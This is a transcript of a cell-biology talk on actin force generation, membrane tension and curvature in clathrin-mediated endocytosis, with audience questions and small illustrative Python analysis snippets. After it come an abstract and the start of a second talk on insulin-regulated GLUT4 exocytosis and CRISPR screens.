The Allen Institute for Cell Science, which I'm also involved with, is making a big library now, using the same parent cell line as we are, with virtually every cell organelle, cytoskeletal structure, signaling protein, and so on and so forth, tagged with GFP or RFP, and so all of these things can now be imaged using the lattice light sheet, for example, to look at whatever your process is, and then you can engineer in your favorite disease mutation — like we heard from Dr. Shen before me, I don't know how you say that disease, but the awful skin disease — you could start to take these cells and differentiate them into keratinocytes and look at these things. So I think this has a lot of promise. Back to actin. Okay, so this is an old experiment that Marco and Yidi Sun did in my lab some years ago. Again, this is a budding yeast cell, and these are these cortical patches, and when you look in a wild-type, untreated budding yeast cell, in a kymograph, you see these hook-like structures where the endocytic protein is present on the surface, and then at the end of its lifetime it curves into the cell when the membrane invaginates. In yeast, if you add an actin inhibitor, latrunculin A, to the cells, you completely block this internalization. Okay, actin is absolutely essential for generating that force. And so we want to use this as a system to study force generation, but we're now starting to look at this in mammalian cells. And so with our genome-edited cells, one question was whether actin is really integral to the endocytic machinery in mammalian cells like it is in yeast cells, and so when we genome-edited the cells for, say, clathrin and actin, we found that essentially every endocytic event in a mammalian cell involves a burst of actin assembly. Again, it had eluded people for many years because it's transient, and it was really Christian Merrifield who found this originally — that there's a burst of actin assembly late in the endocytic pathway — but I think our work with these genome-edited cells added to that by showing that it's really something that happens at essentially every endocytic event. I'm sorry, so what this experiment is, it's looking at actin at endocytic sites: we've labeled actin with RFP, and we've labeled dynamin with GFP, and showed that at essentially every site there's a burst of actin assembly. Yeah, thank you for slowing me down. So then, using our genome-edited cells, where we think the events are more regular and it's easier to detect perturbations, we've done a lot of sort of drug screens and RNAi. And here — again, whether actin was involved in endocytosis in mammalian cells and how important it was had been a question for many years, with a lot of inconsistent data in the field — as we titrated latrunculin, this actin inhibitor, and looked — these are kymographs looking at the lifetimes of dynamin — we found in wild-type cells it's very regular. In our cells, it's generally around 18 seconds of lifetime, but as you titrated more and more actin inhibitor, the lifetime of the dynamin got longer and longer, showing that that final step of vesicle formation is getting delayed and impaired in the absence of actin. Okay, so now we want to think about how actin might be working to help make endocytic vesicles. And so for quite some time, I've been collaborating on mathematical modeling with George Oster in my department.
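A sketch of the bookkeeping behind the lifetime analysis just described: given the appearance and disappearance frames of each tracked dynamin spot at several inhibitor doses, compute a lifetime distribution per dose. The numbers below are entirely synthetic (only the ~18 s wild-type lifetime echoes the talk); the doses, the frame interval and the exponential toy distribution are assumptions for illustration.

    import numpy as np

    def lifetimes(events, frame_interval_s):
        # events: list of (start_frame, end_frame) pairs for tracked dynamin spots
        return np.array([(end - start) * frame_interval_s for start, end in events])

    rng = np.random.default_rng(3)
    frame_interval = 1.0  # seconds per frame (assumed)

    # synthetic data: mean lifetime grows with inhibitor dose, as reported qualitatively above
    doses_uM = [0.0, 0.1, 0.25, 0.5]
    mean_lifetime_s = [18, 25, 40, 70]
    for dose, mu in zip(doses_uM, mean_lifetime_s):
        n = 200
        starts = rng.integers(0, 500, n)
        durations = np.maximum(1, rng.exponential(mu, n).astype(int))
        lt = lifetimes(list(zip(starts, starts + durations)), frame_interval)
        print(f"latrunculin {dose:4.2f} uM: median dynamin lifetime {np.median(lt):5.1f} s (n={n})")

A rightward shift of this distribution with dose is the quantitative version of "the lifetime of the dynamin got longer and longer".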
Lately, George has retired, and my collaboration has been handed off to Padmini Rangamani, who's now at the University of California, San Diego. And these two folks in my lab, a graduate student, Julian Hassinger, and postdoc Matt Akamatsu, have been doing mathematical modeling. Julian has been doing continuum modeling and Matt agent-based modeling, and there's been sort of a nice synergy between the two of them. For Julian's work, he views the membrane as an elastic sheet and then starts to vary parameters to see how they affect the vesicle formation. So for example, he can vary the spontaneous curvature of the proteins that form the coat, or the surface area of the coat, and he can show that he can form vesicles; but then, over sort of a physiological range of membrane tensions, he finds that he can stall the endocytic process, and that depending on how much tension there is, it will stall either at this sort of U shape, before the U-to-omega transition, or it can stall at a very early stage. And Julian went on to show in his paper that if you stall these events at higher membrane tension, but still within a physiological range, you can add forces that might be provided by actin to push the pathway towards completion. Now, it was very satisfying to us that these structures accumulated in the stalled cells, because it fit well with work mainly, I think, from Tommy's lab and from Sandy Schmid's lab. Tommy had this very nice study where he both varied membrane tension and looked in cells where there were natural differences, in polarized epithelial cells — the apical surface has high membrane tension compared to the basolateral surface — and found that you could, with actin inhibitors, inhibit endocytosis at the high-tension apical surface, but that the basolateral surface was much less sensitive to actin inhibition. And basically the modeling work that Julian had done fit very well with some of the experimental work from Tommy's lab and Sandy's lab, suggesting that actin was really required when you have high membrane tension. So then in Julian's model he varied where the actin forces might be acting, and in one scheme he had the actin sort of working like we think it works from our yeast studies, by pulling the vesicle in, and he also had the actin generating the pinching force, and actually both of these could help drive the process towards completion. So Matt then started to use his agent-based modeling, where he's looking at every single actin filament and individual molecules in this process, but in doing so, while we had a whole wealth of information from studies like those from Tom Pollard's about all the relevant physical properties and physical constants and levels for the actin cytoskeleton, there were a few things we didn't have at endocytic sites. And so one of the things Matt did was build a really robust system for translating a fluorescent signal into a number of proteins. And I think this is something that I want to become part of our regular workflow in the lab: every time we get a fluorescent signal, to be able to immediately read out a number of proteins. And so what Matt did is he adopted a system developed by David Baker, where he builds these synthetic nanocages. Well, he designed — he engineers them — proteins that make nanocages of different numbers, 12, 24, 60, 120, and then puts GFP on them and then expresses these in cells.
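The nanocage calibration just introduced amounts to a linear standard curve: fit mean single-particle fluorescence against known GFP copy number (12, 24, 60, 120), then convert the intensity of an endocytic-site signal into an estimated number of molecules. A minimal sketch with made-up intensities — the slope, offset and the example endocytic-site value are not real measurements:

    import numpy as np

    copies = np.array([12, 24, 60, 120])                       # GFP molecules per nanocage standard
    mean_intensity = np.array([310.0, 620.0, 1540.0, 3050.0])  # made-up mean spot intensities (a.u.)

    # least-squares line through the standards: intensity = slope * copies + offset
    slope, offset = np.polyfit(copies, mean_intensity, 1)

    def to_copy_number(intensity):
        return (intensity - offset) / slope

    site_intensity = 3900.0   # hypothetical Arp2/3-GFP intensity at one endocytic site
    print(f"estimated molecules at this site: {to_copy_number(site_intensity):.0f}")

The value of expressing the standards in the same cells and imaging them under the same conditions is that the slope absorbs the per-GFP brightness and the imaging settings, so any spot intensity measured in that session can be read straight off the curve.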
And so these individual puncta each represent a certain, known number of GFP molecules, and that makes a really nice standard curve over a range of numbers that's relevant for most of the numbers involved in endocytosis. And so we can use that, for example, to look here at dynamin and the Arp2/3 complex, which nucleates actin, the dynamins in purple and the Arp2/3 in green, and we can count the number of Arp2/3 complexes. And so now for Matt's modeling we know that there are about 150 Arp2/3 complexes, and so on and so forth: more numbers to add to this model. So Matt has built this model using François Nédélec's Cytosim program, and he models the vesicle as this object hanging from a spring, which is the plasma membrane, and then he puts in Arp2/3 complexes and capping of filaments, and he does a sweep of parameter space so that we can explore, within a biologically reasonable range, these various parameters that are all known, or that we've determined, for his mathematical model. And the question is: can he generate a system that self-organizes itself around an endocytic site and that generates sufficient force to overcome the highest membrane tension that we think occurs in a physiological context where endocytic vesicles are forming? And so here he's plugging in numbers that he's either determined or that come from the literature, and he's done these simulations, and now he can in fact generate a network that self-organizes itself around this vesicle and generates sufficient force to pull the vesicle in against this spring. So from Matt's work we can generate this sort of self-organizing actin network; the one we have now is more in this mode. And then, some of the conclusions I already mentioned: he can generate about 15 piconewtons of force, which we think is sufficient to overcome even very strong membrane tension. Can I ask a question? Yeah. Why is the nucleator in the bulk and not at the plus end? Okay, okay, I'm sorry, I'm going fast, I'm not explaining everything. There are two classes of proteins: the nucleators are blue, and they are generally at the base, on the membrane. These purple proteins are coat-associated actin filament binding proteins. Sorry, and that's an important point: it's not a nucleator. So for example, there's a protein called HIP1R that binds to clathrin, binds to PIP2, and binds to actin filaments, and it's part of the coat. My former student, Åsa Engqvist-Goldstein, showed that. So the purple protein, thank you for asking that, the purple protein is a filament binding protein that captures filaments nucleated at the base. So in this model then, I said there are two modes in which Julian found actin could help to overcome high membrane tension. And so we wanted to know what actin actually looks like at endocytic sites. Actin is really hard to see in the EM compared to, say, microtubules. But Tatyana Svitkina's lab has done, I think, the nicest study looking at actin around endocytic sites, and what she does is platinum replica shadowing of unroofed cells, and she sees something that looks much more like that first model, where the actin is helping to pinch off the vesicle, because the actin is concentrated around the base of the endocytic vesicle. Now, this work is beautiful and I love it, and I think it's showing you how some of the actin is organized, but there are a couple of problems with this kind of analysis. One, it's EM, and you can't look at a very large number of events.
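The nanocage calibration just described amounts to fitting a standard curve of spot intensity against known GFP copy number and then reading protein counts off that line. Here is a minimal sketch; the intensity values are invented placeholders, and a real workflow would include background subtraction and per-session recalibration.

```python
import numpy as np

# Standard curve from nanocage standards with known GFP copy numbers.
copies    = np.array([12, 24, 60, 120], dtype=float)
intensity = np.array([1.1e3, 2.3e3, 5.8e3, 1.19e4])   # arbitrary units per spot (made up)

# Least-squares slope through the origin: intensity ~ slope * copies
slope = np.sum(copies * intensity) / np.sum(copies ** 2)

def molecules(spot_intensity):
    """Convert a background-subtracted spot intensity into a GFP copy number."""
    return spot_intensity / slope

arp23_spot = 1.5e4   # hypothetical tagged Arp2/3 spot intensity at one endocytic site
print(f"~{molecules(arp23_spot):.0f} Arp2/3 complexes at this site")
```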
You can't vary parameters like membrane tension very easily, just because there's so much work needed to generate these images. And also, because these cells are unroofed, in order to get these kinds of images they did something very violent to the cells: they ripped the top of the cell off and then looked at what was left behind. So if part of the machinery that's associated with these endocytic sites is more tightly associated with what's being ripped off than with what's left behind, it will be gone. So for us, for our modeling and for understanding this process, it's really important to understand how actin is organized. And so we decided to strike up a collaboration with my colleague Ke Xu in the chemistry department at Berkeley. My postdoc, Charlotte, collaborated with Ke's postdoc, Sam Kenney, and generated, by super-resolution imaging, STORM imaging, thousands and thousands of images of actin around clathrin sites. And Ke has come in and helped us do some quantitative analysis of these images. What's really interesting now is that we find basically two classes of structure. So clathrin is shown in red and actin is shown in teal, or whatever that color is. At many sites, and at the majority of sites in just normal growing cells, what we see is that the clathrin is higher than the actin. So the actin is around the base of the clathrin-coated vesicle. This is exactly like what was seen in that EM study from Tatyana Svitkina's lab. However, we also see this other kind of figure, where the clathrin is completely engulfed in actin. And I should tell you, for their data set they use a surrogate timer to figure out where they are in the endocytic pathway, which is labeled dynamin. Dynamin appears very late in the pathway, so they only analyzed endocytic sites that had dynamin associated with them. And what they found is that normally the endocytic vesicle, the clathrin, is higher than the actin. That's shown here, because the blue is the height of the actin and the red is the height of the clathrin. And I can tell you, one of the things that's really cool about the super-resolution imaging is that it's done in x, y, but if you put this cylindrical lens in the path, you can actually generate z data. So this is actually a z projection from data that was collected in x, y, which I think is really cool. But anyway, that's an aside. So anyway, this is the height of the actin and the red is the height of the clathrin. Now, if you do a transient osmotic treatment to raise the membrane tension, what you see is that you shift this distribution. So now, at the majority of the endocytic sites, the clathrin is engulfed in actin. And so we think that the cell responds to high membrane tension by assembling more actin, and actin with a different geometry. And it's interesting to think about what might be the tension sensor that's sensing the higher tension, and whether it's a different nucleator that is nucleating the actin around the top of the clathrin pit as opposed to the bottom of the pit. And so this data set is really, really rich, and we think we can do things now like look at class averages and actually get some more structural information from it. And we can look at other perturbations to the system. So in the last couple of minutes, I just wanted to tell you one short little vignette about a project we've had.
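The two classes of structure described above (actin at the base versus clathrin engulfed in actin) can in principle be scored from 3D localization data by comparing the axial positions of the two channels at each site. A toy version of that classification is sketched below; the coordinates are simulated and the simple median-height rule is an assumption, not the actual quantitative analysis used on the STORM data.

```python
import numpy as np

def site_class(clathrin_z_nm, actin_z_nm):
    """Classify one endocytic site from 3D localizations: is the clathrin
    centroid above the actin (actin at the base) or engulfed by it?
    Here z is taken to increase into the cell from the coverslip."""
    dz = np.median(clathrin_z_nm) - np.median(actin_z_nm)
    return "clathrin above actin (actin at base)" if dz > 0 else "clathrin engulfed in actin"

# Hypothetical localization z-coordinates (nm) for one site under low tension
rng = np.random.default_rng(0)
clathrin_z = rng.normal(120, 20, 500)
actin_z    = rng.normal(60, 25, 800)
print(site_class(clathrin_z, actin_z))
```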
So a long time ago, with George Oster, we shared a postdoc named Jin Liu, who collaborated with my long-time postdoc and specialist, Yidi Sun, and did a theory paper. One of the notions in that paper, which is, I think, very commonly discussed now, but was a little less common then, was that there's a crosstalk between the geometry of the membrane and the biochemical reactions that are occurring throughout this endocytic process. You can think of endocytosis as a cascade of events where the curvature, the geometry, of the membrane is constantly changing, and these geometries are being read back by the biochemical reactions. So for example, there are proteins that bind specifically to curved membranes, BAR proteins, for example. If one of those proteins binds, that will give the adjacent membrane the ideal curvature, so more proteins can bind. And then also enzymes that act on the bilayer: if the bilayer is flat, they may have a hard time accessing bonds, but as it becomes curved, they could act more quickly, and so on and so forth. So there's this notion that there's crosstalk between the curvature and the biochemical reaction rates. We liked that notion, but it just kind of sat there for a while. And here are some words from George. George says that modeling can tell you how things might work, modeling can also tell you how things cannot work, but modeling cannot tell you how things do work; for that, you need experiments. And so what we wanted was a way to experimentally test whether curvature was affecting this process. So we did some elegant studies of pulling tethers from GUVs, but we came up with another way to look at curvature in live cells, which was this: I met this woman named Bianxiao Cui, who's a materials scientist at Stanford University, and they make nanoarrays (we saw microarrays in the previous talk). These are arrays that she makes by etching on a nanometer scale on quartz glass. What happens is you can sit cells down on these nanoarrays, you can also put supported bilayers on them, and the bottom of the cell actually tightly conforms to the curvature of the pillars, and you can dial in all sorts of curvatures. And then we have all these genome-edited cells, so we could put the cells on these substrates. This one happens to have bars; sometimes they're pillars. The bars are flat in the middle, and they have very high curvature at the ends. If you put our genome-edited cells on them (here are two of the bars), it turns out that the highly curved ends of the bars become hotspots. And this is now a kymograph, and you see clathrin, dynamin, clathrin, dynamin, clathrin, dynamin; they're just streaming off vesicles at these highly curved sites. And so this was very exciting to us, and you can see it actually happening in EM. Here's a cross-section of a pillar; there's an endocytic vesicle budding from the edge of the pillar. The only problem with this system is that it was very hard to make these nanoarrays. Fortunately, at Berkeley, we found that we have another way of making these: we now etch molds and then we use a polymer, and we can stamp out these nanoarrays. So now, this one happens to have ridges, and you can see, looking at the dynamin, for example, that endocytic vesicles are coming from the crowns of these ridges. And so it's nice now, because we can make lots of these, and so we can do things like RNAi screens and see if we've bypassed certain steps in the process.
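One way the hotspot observation on the nanopatterned substrates could be quantified is as an event rate per unit area on curved features versus flat regions. The sketch below just shows that arithmetic with made-up event counts and areas; it is not the lab's analysis, only an illustration of the comparison.

```python
import numpy as np

# Hypothetical event counts over curved vs. flat regions of a nanopatterned substrate.
rng = np.random.default_rng(0)
events_on_ridge = rng.poisson(lam=30)   # e.g. dynamin bursts detected over curved area
events_on_flat  = rng.poisson(lam=8)    # bursts detected over flat area
area_ridge_um2, area_flat_um2, minutes = 5.0, 20.0, 10.0

rate_ridge = events_on_ridge / (area_ridge_um2 * minutes)
rate_flat  = events_on_flat / (area_flat_um2 * minutes)
print(f"curved: {rate_ridge:.2f} events/um^2/min, flat: {rate_flat:.2f}, "
      f"enrichment ~{rate_ridge / max(rate_flat, 1e-9):.1f}x")
```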
Our hypothesis is that there's some rate-limiting step where you have to generate initial curvature, and then you attract more curvature-sensing proteins, and so on and so forth. And if you're interested in this, I have some iBiology talks that were just posted online. So these are the people who did the work; I tried to mention everyone as we were going along, and I don't see anyone that I didn't mention. This is the lab. There's me, and it's a joint lab with my wife, Georjana Barnes, who's here in the audience at the meeting. And I thank you very much for your attention. Okay, so thank you very much for the beautiful talk. We have time for questions. What do you think determines the size of the vesicles? Is there much variability in the size of the endocytic vesicles you can make, and what determines it? So naturally, you mean? Naturally. Yeah, well, it's interesting. You know, when we differentiate these, so the stem cells actually have a somewhat variable size, and there's kind of a range, I'm going to say 80 up to maybe 200 nanometers. Is that too big? Yeah, too big? A little smaller. Okay, but you know, in these neuroprogenitor cells, they're very, very regular and very small, on the small end of that range. So you can vary them, and in fact Tommy's done these beautiful studies with viral infections showing how adaptable clathrin is; the coat can actually encase something quite large. But that's given by what is being taken up. So naturally, you mean? Naturally. And if you play with your membrane tension, do you change the size? Yeah, that's a good question. But Tommy says no, so I don't think so; I haven't looked at the absolute number. So what makes sure that they don't collapse? Clathrin self-assembles and is a rigid molecule. It's rigid enough; as it builds, it puts in hexagons and pentagons, so the overall curvature is defined by the ratio of hexagons to pentagons. What exactly does that look like here? As David says, the neuronal ones are the smaller guys, like the coated vesicles that you have in the secretory pathway in all cells, which are small. But can you have huge ones, say with pressure inside? No, no, no. The vesicles that are forming from internal membranes inside the cell, the endosomes, they're all small guys. No, but at the plasma membrane? At the plasma membrane, we have never seen changes in the overall shape just by changing tension, right? What does change it is, a little bit, the cargo. So they adapt a little to the size of the cargo, with an upper limit. If we go beyond 100 nanometers, they stall; they get flat. We've also done mass spec to look at the differences in the clathrin-associated proteins in the three cell types that we've compared, the stem cells, the neuroprogenitors, and fibroblasts. We found some interesting differences, and at least one of them, if we modulate it, we can change the geometry of the vesicles. AP2, actually. Have you looked at how the lipid composition changes in your different differentiated cell types? No, it's very interesting. No, we have not done that. There are some nice probes available now, but we haven't done that. The young guy. The young guy. This might be a basic question, but why are those ridges hotspots for endocytosis? Yeah, that's what we're trying to figure out now. Our idea is that the curvature is a signal that's attracting proteins; there's some limiting step where some initial curvature may help to recruit proteins.
And so there are proteins that bind specifically to curved membranes, like clathrin, for example, which likes to make a cage. And so by giving the cell curvature, you're attracting those proteins. So we have a strategy, but we haven't been able to do many experiments, because the quartz substrates we had were made at Stanford; it takes a day to make each one, at a cost of about $1,000. We can make about 15 of these in two hours now. So we're just at a place, it's taken us two years, but we're just at a place where we can stamp these things out and ask that kind of question. Maybe I can continue on this question. So the naive expectation is that the first coat component that would be sensitive to that kind of curvature, which is not that high, would be the F-BAR, right? So if you deplete the F-BAR, do you change the localization? That's... we're setting up to do those experiments. Literally, we've got these substrates. You know, we had to go through all these polymers to find things that weren't autofluorescent, my student learned the CAD programs and had to go to Lawrence Berkeley National Lab and learn how to etch everything. So now he, Bob, is ready to go. So those are good questions, yeah. I'm going to continue on this. In epithelial cells, you have all kinds of specializations, infoldings and brush borders and all those. Is endocytosis actually preferentially coming from the pits, from the curvature, or not? I don't think so. I mean, I think it's possible the cell might exploit some natural fluctuations and trap a state. But you know, one of the things we're going to explore now is that we want to set up some kind of systematic study. I think you heard today, on the micron scale, about septins recognizing curvature, and the clathrin pathway being influenced by curvature. We think there are probably a lot of other things happening that are affected by curvature. So we want to use this system to look systematically at a lot of processes and see what else is responding. But I don't know, so in a natural setting, yeah, I don't have a comment on that. Otherwise there's something funny about this. At least in the fish we haven't seen that. Oh, that there's a preference for where they come from. Yeah. This might be more a question for you. I was wondering whether force is the only way actin acts here, or whether there might be other mechanisms. For instance, I'm thinking of a paper by Jitu Mayor and Ludger Johannes, in which they proposed that actin plays a role in phase separation. Oh, yeah. And that would be important for scission, or in many other ways. So we had a paper in eLife this year where we actually proposed something like that, that multivalent interactions make a phase separation to nucleate the actin. But there is your question also about whether actin is doing something else. In budding yeast, it's really clear that actin does something else, which is that it sends back a negative signal to take everything apart, to turn off actin nucleation and to uncoat the vesicle. If you remember, I showed an image from yeast where we used this latrunculin A. When you look at a coat protein like clathrin, when you block actin, it assembles on the surface and it just stays there, whereas normally it forms and turns over. And we've actually found a couple of the proteins responsible, which may be yeast-specific.
One is a protein kinase that phosphorylates an activator of the Arp2/3 complex and turns it off. Another is a synaptojanin, which binds indirectly to actin, recruiting it to facilitate the uncoating step. So there the actin not only generates a force, but it also negatively feeds back on the processes that set up the site. So, I was wondering about the type I myosins that are involved in yeast endocytosis. Do you know what they do there, and are they also involved in mammalian cell endocytosis? Yeah, so there are type I myosins in mammalian endocytosis. In yeast, they are almost essential for the invagination step. And so I have a very good student, Ross Pedersen, working on that process. They're interesting proteins, because the one in yeast both nucleates actin assembly and has a motor domain. And we have a collaboration with Michael Ostap at Penn, who's a single-molecule biophysicist, and we're characterizing the type I myosin in budding yeast. There are two kinds of myosin motor, roughly classified: some are tension-sensitive clasps that, when you pull on them, just bind very tightly to actin, and the others are force-generating motors. With the single-molecule experiments, you can differentiate which type it is. We were, or at least I was, really betting that we had a tension-sensitive clasp, that the myosin was actually holding everything together. But in fact, from the kinetic profiles, it looks much more like a force generator. And in budding yeast, according to the theoretician that Fred Chang collaborates with in fission yeast, the amount of pressure you need to make an endocytic vesicle in yeast, which grows with tremendous turgor pressure, would be equivalent to pushing your finger into the tire of your car, to put it in a sort of real-world sense. So I think it may be more moot in mammalian cells, but we've definitely cloned it and tagged it, and the same person doing the super-resolution work is studying the myosin in my lab. We just got an inhibitor of the type I myosin through the mail from someone in Germany, and we're trying to figure out what it does in mammalian cells. If there's time for one more, then we can take coffee. There's this guy in the back who's been patient. David, this is probably philosophical. I mean, COPI and COPII vesicles are roughly the same size. They don't use actin, they don't use BAR domain proteins. Is this actin-driven process entirely due, perhaps, to the surface properties, because there is so much cytoskeleton there to begin with? Does it have to do with the tension? I mean, although Tommy says tension has no role. What? No, no, he said the opposite. He said the opposite. Tommy actually did a nice study, I think, to clarify the role. Is that it? Because the membranes are so tense that you need extra force to invaginate them? I think that might be true, but actin is also used for some intracellular trafficking events, the AP1 ones, I think. Is it AP1 with the... AP1 without actin doesn't work. I mean, basically, the bilayer there is not tense. I'm talking about COPII and COPI. But if that bilayer is not tense, then the plasma membrane has to be... Is that it? Is that it? It's not. It is not. You have a lot of excess area, so the plasma membrane is not tense, they say. But this guy says it is. But sometimes, but sometimes, there are some events that probably... You agree that the plasma membrane under normal conditions, the bilayer, is not tense, right?
So, in fact, to follow up, I mean, one point I wanted to make: you said that essentially all the endocytic events in your cells are recruiting actin, right? The events, well, 90% according to my... So, when we did our systematic analysis, we were looking at this, right? The actin only appears at about 60% of the endocytic events. The pits that don't have it are perfectly functional; they're coming in. How did you tag actin? Excuse me? I'm sorry, how are you looking at actin? What did you use for actin? I don't remember. But it was actin. I can't remember what it was... Go get it. I should go... I should look at my own paper, right? Yes. Why is that important? I'm just kidding. I'm just kidding. We see 90 or so, 60, I don't know, but maybe... No, but there was a difference. The guys that had the actin were shorter-lived and... Yeah, they were faster. Okay. There was no difference in the size of the pit. I see. But those were faster, the kinetics were faster. That was interesting. Yeah, yeah, yeah. Okay. Well, you know, in our latrunculin titration, we saw it slowed the events. Yeah, but that's not the problem, though. When you do the latrunculin, you're disturbing the whole... Yes... stages of... We tried to look acutely, but now we've also... We actually get exactly the same thing with Arp2/3 inhibitors. Yeah, yeah, yeah. Thank you for the discussion. Thank you. Enjoy the coffee. Thank you.
|
Clathrin-mediated endocytosis (CME) is the best-studied pathway by which cells selectively internalize molecules from the plasma membrane and surrounding environment. We study this process by live-cell microscopy in yeast and mammalian cells. The yeast studies have revealed a regular sequence of events necessary for endocytic vesicle formation involving some 60 proteins, which induce a highly choreographed series of changes in membrane geometry, ultimately resulting in scission and vesicle release. To analyze endocytic dynamics in mammalian cells in which endogenous protein stoichiometry is preserved, we have used genome editing for the clathrin light chain A and dynamin-2 genomic loci and generated stem cells expressing fluorescent protein fusions from each locus. These cell lines are being used to study actin assembly at endocytic sites and to make 3D organoids in culture. Using nano-patterned substrates, we are actively studying roles for membrane curvature in endocytic dynamics. At the same time, studies in yeast cells have recently focused on discovery of regulatory mechanisms for ensuring the proper order and timing of events in the endocytic pathway and on how actin assembly at endocytic sites is regulated. Studying the yeast and mammalian systems in parallel is allowing us to translate what is learned from one system to the other.
|
10.5446/50889 (DOI)
|
Okay, so I'd like to begin by thanking Nawa and the other organizers for inviting me. It's my great pleasure to come here and speak at this really fascinating meeting, and also to take a break from my teaching in Colorado. So, this diagram shows you a membrane protein on the cell surface. These proteins are the windows and the doors of the cell. They include receptors, channels, and transporters, and they allow the cell to communicate with the outside environment. As you can imagine, the surface levels of these proteins must be precisely controlled. Too much of a protein or too little of a protein can often disrupt the physiological pathway associated with that protein, and in humans this may cause diseases. So here I can give you one example many of you already know. If you have too high a level of activated EGF receptors on the cell surface, this is going to cause uncontrolled proliferation of the cells, and this may cause cancer. On the other hand, if you have too low a level of the GLUT4 transporter, as you're going to see in a moment, this is going to disrupt blood glucose homeostasis, and in humans this may cause type 2 diabetes. Now, how is the surface level of these proteins determined? It is determined by the balance of exocytosis and endocytosis. Exocytosis is a vesicle fusion event, which involves the fusion of an exocytic vesicle with the plasma membrane, and this delivers the cargo to the plasma membrane. Endocytosis, on the other hand, removes the cargo from the plasma membrane and returns it to the endocytic compartments. Remarkably, both exocytosis and endocytosis can be regulated by stimuli, and in this way the surface level of a membrane protein can be adjusted acutely according to physiological demands. And here a stimulus could be a second messenger; it could be phosphorylation. Now, a major model system we have been using to study surface protein homeostasis is insulin-controlled GLUT4 translocation. GLUT4 is quite an unusual glucose transporter, because under the basal condition GLUT4 is sequestered in intracellular compartments, not on the plasma membrane. This is because your blood sugar level is normal and you don't need to take up glucose. At this basal stage, exocytosis and endocytosis are at equilibrium. So now imagine you have food. Your blood sugar goes up, and this triggers insulin secretion from the pancreas; the insulin then travels in the bloodstream and reaches the target tissues, mostly adipocytes and skeletal muscle. When insulin binds to its receptor on the plasma membrane, this activates the insulin signaling cascade, which eventually leads to the activation of exocytosis. At the same time, endocytosis is moderately reduced. The result is a translocation of the GLUT4 protein from vesicles to the cell surface, and this translocation allows the transporter to take up glucose into the cell, where it is either burned for ATP or stored. Now, this is your blood glucose level after you have food; time zero is the time you have the meal. You can see your blood glucose level quickly goes up, but also rapidly returns to the normal range, and this return to the normal range is driven by insulin-stimulated GLUT4 translocation. When your blood glucose returns to the normal range, insulin signaling terminates, and this also shuts down exocytosis. At the same time, endocytosis resumes, and this leads to the retrieval of GLUT4 from the cell surface and its return to the vesicles.
Now you can see that insulin controls the surface level of the GLUT4 transporter by regulating exocytosis and endocytosis. As much as we love GLUT4 exocytosis, the major goal of our studies is to use it as a paradigm to establish the general principles of surface protein homeostasis. For example, we expect our findings can be extended to understand the trafficking of neurotransmitter receptors in neurons, the transport of water channels in kidney epithelial cells, and the trafficking of immune receptors in the immune system. Today I'm going to tell you two stories on the regulation of surface protein homeostasis. I'm going to begin with a short story on the regulation of Rab GTPases by a protein called RABIF in exocytosis. Then I'm going to focus on a very recent finding on the regulation of AP2 adapter formation by AAGAB in endocytosis. So I'll begin with exocytosis. Exocytosis, as I mentioned, is a vesicle fusion event. This happens after Rabs and tethers bring the vesicle and the target membrane together. The vesicle fusion itself is driven by two classes of molecules: SNAREs and, the second one, SM proteins, the Sec1/Munc18 proteins. SNAREs are membrane-anchored proteins. You have a vesicle-anchored SNARE, called the v-SNARE, and a target-membrane-anchored SNARE called the t-SNARE. When the v-SNARE and the t-SNARE see each other, they spontaneously assemble into a so-called trans-SNARE complex, and the trans-SNARE assembly proceeds toward the membrane. So you can imagine this is like a zippering process, which forces the two membranes into close proximity to fuse. The SM protein is a soluble protein; it binds to the trans-SNARE complex and accelerates trans-SNARE assembly. SNAREs and SM proteins are the core engine for vesicle fusion. In addition to this core engine, GLUT4 exocytosis also requires specialized regulatory factors, such as Synip, tomosyn, and Doc2b. Our previous work focused on biochemical dissection of these molecules. Since most of that work has already been published, I'm not going into details here. But I'd like to mention that these proteins, I believe, only represent a minor fraction of the entire regulatory network for GLUT4 exocytosis. The sequencing of the human genome predicted a large number of membrane proteins, and for the majority of these membrane proteins we know virtually nothing. So I think the most important direction in the field is to comprehensively identify new regulators of GLUT4 exocytosis. Our quest coincided with the advent of CRISPR-Cas9 genome editing, so we decided to perform unbiased genome-wide CRISPR screens. We took advantage of existing genome-wide CRISPR libraries, but we also made our own custom CRISPR libraries. These CRISPR libraries are all lentivirus-based: you have a single-guide RNA and also Cas9. The single-guide RNA recruits the Cas9 protein to a specific location in the genome to introduce loss-of-function mutations. To perform the screens we used an HA-GFP-GLUT4 reporter. This reporter has an HA epitope inserted into an extracellular domain. HA staining, as you can see here, stains the surface pool of the GLUT4 reporter; on the other hand, the GFP tells you the total protein in the cell. So if we calculate the ratio of HA staining to GFP staining, this gives you information about the relative amount of the GLUT4 reporter on the cell surface.
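The reporter readout described above reduces to a per-cell ratio: surface HA signal divided by total GFP signal. Here is a minimal sketch with simulated flow-cytometry values standing in for real measurements; the basal and insulin-stimulated surface fractions below are arbitrary illustrative numbers, not data.

```python
import numpy as np

rng = np.random.default_rng(1)

def surface_ratio(ha, gfp):
    """Median per-cell surface-to-total ratio of the HA-GFP-GLUT4 reporter."""
    return np.median(ha / gfp)

# Simulated per-cell signals: GFP = total reporter, HA = surface reporter.
gfp_total  = rng.lognormal(mean=7.0, sigma=0.3, size=10_000)
ha_basal   = 0.15 * gfp_total * rng.lognormal(0, 0.2, size=10_000)  # assumed ~15% surface
ha_insulin = 0.60 * gfp_total * rng.lognormal(0, 0.2, size=10_000)  # assumed ~60% surface

print(f"basal   surface/total ~ {surface_ratio(ha_basal,  gfp_total):.2f}")
print(f"insulin surface/total ~ {surface_ratio(ha_insulin, gfp_total):.2f}")
```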
So we made a stable cell line expressing this GLUT4 reporter, we mutagenized it using the CRISPR-Cas9 library, and then we treated the cells with insulin. Then we used flow cytometry to sort for the cells with low GLUT4 reporter on the cell surface, and we repeated the process three times. We then took the sorted population, recovered the single-guide RNAs, and used deep sequencing to analyze the abundance of the single-guide RNAs. Then we used bioinformatic tools to call the significant hits, and finally we performed secondary screens and individual validations. We performed the screen in multiple cell lines. We started with proof-of-concept screens in cancer cell lines, but eventually we focused on myoblasts and preadipocytes. Very briefly, our screen identified a large number of single-guide RNAs that were significantly enriched compared to the control population. We then used this equation to calculate the abundance of the single-guide RNAs so we could derive significant hits from the screens. While the screens identified a large number of genes, the majority of the hits were not previously linked to GLUT4 exocytosis. But we did recover known regulators such as Rab10, the exocyst, and almost the entire insulin signaling cascade. So here I'm going to focus on one new factor identified in the screen, called RABIF. RABIF, Rab-interacting factor, is a very small protein, a 14 kDa soluble protein. When I did a sequence analysis, the only prediction was that it's a putative guanine nucleotide exchange factor, a GEF, for Rabs. Now, 